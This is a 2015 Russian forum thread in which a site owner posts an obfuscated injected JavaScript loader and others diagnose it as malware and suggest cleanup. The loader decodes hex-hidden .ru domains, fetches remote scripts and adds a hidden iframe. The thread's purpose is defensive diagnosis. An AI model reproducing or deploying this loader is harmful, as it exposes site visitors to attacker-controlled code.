Появление стороннего JS-кода на сайте

@bet-team · Регистрация: 24.01.2013

Студворк — интернет-сервис помощи студентам

На сайте появился вот такой код. Что бы он мог значить?

JavaScript
1
<script>window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="9916",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},a=function(o,e,t){var n=document.location.protocol+"//"+o;if(window.smlo)window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo)window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("site.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();</script><p><iframe id="a1996667054" src="http://ui5nvtxlm.ru/f.html" style="display: none;"></iframe>

@fenix1991 · 21.07.2015, 13:16

Что это вирус. Проверяйте сайт с помощью ai-bolit. Обновляйте cms и все модули cms.
При желании меняйте все пароли (пока в своей практике не сталкивался, что смена паролей помогает, но кто знает..)

@bet-team · 21.07.2015, 13:18 **[ТС]**

Сообщение от fenix1991

Что это вирус.

А что за вирус? Что он делает? Какой вред может нанести?

@fenix1991 · 21.07.2015, 22:46

Редко когда у вирусов есть название. Часто вирусы просто рассылают спам, либо крадут какие-либо пользовательские данные. В основном схема такая: заливается через какую-либо уязвимость на сайте файлик, который потом вызывается через определенную схему (например с передачей гет параметра)

@Baxymba · 22.07.2015, 18:49

У меня такой тоже появился сегодня на сайте! Удаляю, а он снова вылазит! Что делать?

@Cdelphi78 · 23.07.2015, 09:52

Сообщение от bet-team

var o=JSON.parse

Сообщение от bet-team

RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\[\]\\\/\+^])/g,"\\$1")

Сообщение от bet-team

var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}

может быть судя по вот этому он что то парсит, ищет какую то инфу на сайте.

@Jetlag · 23.07.2015, 10:08

Cdelphi78, откуда такой вывод, если не секрет?

@Cdelphi78 · 23.07.2015, 10:17

Ошибся? Ну вот эта штука для RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\[\]\\\/\+^])/g,"\\$1") для поиска слов не

@Jetlag · 23.07.2015, 11:25

Cdelphi78, не. Я понимаю что Вы не по js совсем, но может не стоит тогда советовать там где не разбираетесь?) Потому что "он что-то парсит, ищет какую-то инфу на сайте" - это хрень, полная =)

Регулярка тут конечно определяется, да. Но регулярки можно много для чего использовать. Как и JSON.parse. Но здесь абсолютно очевидно, что это часть механизма обфускации. Продравшись через эту цепочку парсов и регулярок мы можем что угодно, мы получим некоторую строку. А в js некоторая строка может быть вообще чем угодно, не только данными. Именем функции, телом функции, адресом на который запрос уедет. Что мы получим расшифровав этот скрипт - хрен его знает. Может рекламу какую в страницы встаривает, может куки уводит

А вообще встраивать в каждый клиент код чтобы найти какую-то инфу на сайте - это 99% чушь. Если этот код встроен через исходники сайта, то легче увести исходники напрямую. Если через xss и нам надо получать некоторую инфу из закрытого раздела сайта - легче стырить авторизационные данные, те же куки например

@Cdelphi78 · 23.07.2015, 11:56

Сообщение от Jetlag

Регулярка тут конечно определяется, да.

Нет ну про регулярку то попал я))

@Jetlag · 23.07.2015, 12:02

Регулярка тут конечно определяется, да. Но регулярки можно много для чего использовать. Как и JSON.parse. Но здесь абсолютно очевидно, что это часть механизма обфускации. Продравшись через эту цепочку парсов и регулярок мы можем что угодно, мы получим некоторую строку.

Быстрофикс:

Регулярка тут конечно определяется, да. Но регулярки можно много для чего использовать. Как и JSON.parse. И здесь абсолютно очевидно, что это часть механизма обфускации. Продравшись через эту цепочку парсов и регулярок мы скорее всего получим некоторую строку.

@z00m3r · 27.07.2015, 11:15

На сайте тоже появился такой код, 26 июля. У нас онлайн-газета, работает несколько редакторов. Так код этот появился только в публикациях одного из редакторов, который в тот день работал из дома. С остальными публикациями пока все ок. Подозреваю, что это не уязвимость сайта, а зараженная машина во время создания публикации дописывает данный код к тексту или скорее всего, это происходит при копировании текста в буфер и дальнейшем его вставлении в визуальный редактор. У нас, если что, используется FCKeditor. Движок сайта полностью кастомный.

@legless · 29.07.2015, 22:34

Столкнулся с этим вчера. Кажется, виновато расширение «Google Translate» для Хрома.
По крайней мере, оно было только на зараженной машине, после чистки всех расширений помогло.

@fenix1991 · 09.08.2015, 22:44

Проверьте антивирусом. Например ai-bolit. Можно воспользоваться virusdie.ru. Плюс смените все доступы и пароли и обновите используемую cms и все модули.
Это стандартная рекомендация) искать уязвимости в коде не особо благодарное дело. Есть сообщества у каждой cms, которое ищет баги. А так искать человека который пофиксит уязвимости долгое и дорогое дело.

Новые блоги и статьи Все статьи Все блоги /
Учёным и волонтёрам проекта «Einstein@home» удалось обнаружить четыре гамма-лучевых пульсара в джете Млечного Пути Programma_Boinc 01.01.2026 Учёным и волонтёрам проекта «Einstein@home» удалось обнаружить четыре гамма-лучевых пульсара в джете Млечного Пути Сочетание глобально распределённой вычислительной мощности и инновационных. . .	Советы по крайней бережливости. Внимание, это ОЧЕНЬ длинный пост. Programma_Boinc 28.12.2025 Советы по крайней бережливости. Внимание, это ОЧЕНЬ длинный пост. Налог на собак: https:/ / ********/ gallery/ V06K53e Финансовый отчет в Excel: https:/ / ********/ gallery/ bKBkQFf Пост отсюда. . .	Кто-нибудь знает, где можно бесплатно получить настольный компьютер или ноутбук? США. Programma_Boinc 26.12.2025 Нашел на реддите интересную статью под названием Anyone know where to get a free Desktop or Laptop? Ниже её машинный перевод. После долгих разбирательств я наконец-то вернула себе. . .	Thinkpad X220 Tablet — это лучший бюджетный ноутбук для учёбы, точка. Programma_Boinc 23.12.2025 Рецензия / Мнение/ Перевод Нашел на реддите интересную статью под названием The Thinkpad X220 Tablet is the best budget school laptop period . Ниже её машинный перевод. Thinkpad X220 Tablet —. . .	PhpStorm 2025.3: WSL Terminal всегда стартует в ~ and_y87 14.12.2025 PhpStorm 2025. 3: WSL Terminal всегда стартует в ~ (home), игнорируя директорию проекта Симптом: После обновления до PhpStorm 2025. 3 встроенный терминал WSL открывается в домашней директории. . .
Как объединить две одинаковые БД Access с разными данными VikBal 11.12.2025 Помогите пожалуйста !! Как объединить 2 одинаковые БД Access с разными данными.	Новый ноутбук volvo 07.12.2025 Всем привет. По скидке в "черную пятницу" взял себе новый ноутбук Lenovo ThinkBook 16 G7 на Амазоне: Ryzen 5 7533HS 64 Gb DDR5 1Tb NVMe 16" Full HD Display Win11 Pro	Музыка, написанная Искусственным Интеллектом volvo 04.12.2025 Всем привет. Некоторое время назад меня заинтересовало, что уже умеет ИИ в плане написания музыки для песен, и, собственно, исполнения этих самых песен. Стихов у нас много, уже вышли 4 книги, еще 3. . .	От async/await к виртуальным потокам в Python IndentationError 23.11.2025 Армин Ронахер поставил под сомнение async/ await. Создатель Flask заявляет: цветные функции - провал, виртуальные потоки - решение. Не threading-динозавры, а новое поколение лёгких потоков. Откат?. . .	Поиск "дружественных имён" СОМ портов Argus19 22.11.2025 Поиск "дружественных имён" СОМ портов На странице: https:/ / norseev. ru/ 2018/ 01/ 04/ comportlist_windows/ нашёл схожую тему. Там приведён код на С++, который показывает только имена СОМ портов, типа,. . .

@fenix1991 25 / 25 / 5 Регистрация: 19.07.2011 Сообщений: 123
	21.07.2015, 13:16
	Что это вирус. Проверяйте сайт с помощью ai-bolit. Обновляйте cms и все модули cms. При желании меняйте все пароли (пока в своей практике не сталкивался, что смена паролей помогает, но кто знает..) 0

@fenix1991 25 / 25 / 5 Регистрация: 19.07.2011 Сообщений: 123
	21.07.2015, 22:46
	Редко когда у вирусов есть название. Часто вирусы просто рассылают спам, либо крадут какие-либо пользовательские данные. В основном схема такая: заливается через какую-либо уязвимость на сайте файлик, который потом вызывается через определенную схему (например с передачей гет параметра) 0

@Baxymba 0 / 0 / 0 Регистрация: 22.07.2015 Сообщений: 1
	22.07.2015, 18:49
	У меня такой тоже появился сегодня на сайте! Удаляю, а он снова вылазит! Что делать? 0

@Jetlag 111 / 49 / 20 Регистрация: 21.10.2013 Сообщений: 212
	23.07.2015, 10:08
	Cdelphi78, откуда такой вывод, если не секрет? 0

@Cdelphi78 140 / 74 / 18 Регистрация: 21.02.2014 Сообщений: 3,444
	23.07.2015, 10:17
	Ошибся? Ну вот эта штука для RegExp("(?:^\|; )"+o.replace(/([\.$?*\|{}\(\)\[\]\\\/\+^])/g,"\\$1") для поиска слов не 0

@Jetlag 111 / 49 / 20 Регистрация: 21.10.2013 Сообщений: 212
	23.07.2015, 11:25
	Cdelphi78, не. Я понимаю что Вы не по js совсем, но может не стоит тогда советовать там где не разбираетесь?) Потому что "он что-то парсит, ищет какую-то инфу на сайте" - это хрень, полная =) Регулярка тут конечно определяется, да. Но регулярки можно много для чего использовать. Как и JSON.parse. Но здесь абсолютно очевидно, что это часть механизма обфускации. Продравшись через эту цепочку парсов и регулярок мы можем что угодно, мы получим некоторую строку. А в js некоторая строка может быть вообще чем угодно, не только данными. Именем функции, телом функции, адресом на который запрос уедет. Что мы получим расшифровав этот скрипт - хрен его знает. Может рекламу какую в страницы встаривает, может куки уводит А вообще встраивать в каждый клиент код чтобы найти какую-то инфу на сайте - это 99% чушь. Если этот код встроен через исходники сайта, то легче увести исходники напрямую. Если через xss и нам надо получать некоторую инфу из закрытого раздела сайта - легче стырить авторизационные данные, те же куки например 0

@z00m3r 0 / 0 / 0 Регистрация: 27.07.2015 Сообщений: 1
	27.07.2015, 11:15
	На сайте тоже появился такой код, 26 июля. У нас онлайн-газета, работает несколько редакторов. Так код этот появился только в публикациях одного из редакторов, который в тот день работал из дома. С остальными публикациями пока все ок. Подозреваю, что это не уязвимость сайта, а зараженная машина во время создания публикации дописывает данный код к тексту или скорее всего, это происходит при копировании текста в буфер и дальнейшем его вставлении в визуальный редактор. У нас, если что, используется FCKeditor. Движок сайта полностью кастомный. 0

@legless 0 / 0 / 0 Регистрация: 29.07.2015 Сообщений: 1
	29.07.2015, 22:34
	Столкнулся с этим вчера. Кажется, виновато расширение «Google Translate» для Хрома. По крайней мере, оно было только на зараженной машине, после чистки всех расширений помогло. 0

@fenix1991 25 / 25 / 5 Регистрация: 19.07.2011 Сообщений: 123
	09.08.2015, 22:44
	Проверьте антивирусом. Например ai-bolit. Можно воспользоваться virusdie.ru. Плюс смените все доступы и пароли и обновите используемую cms и все модули. Это стандартная рекомендация) искать уязвимости в коде не особо благодарное дело. Есть сообщества у каждой cms, которое ищет баги. А так искать человека который пофиксит уязвимости долгое и дорогое дело. 0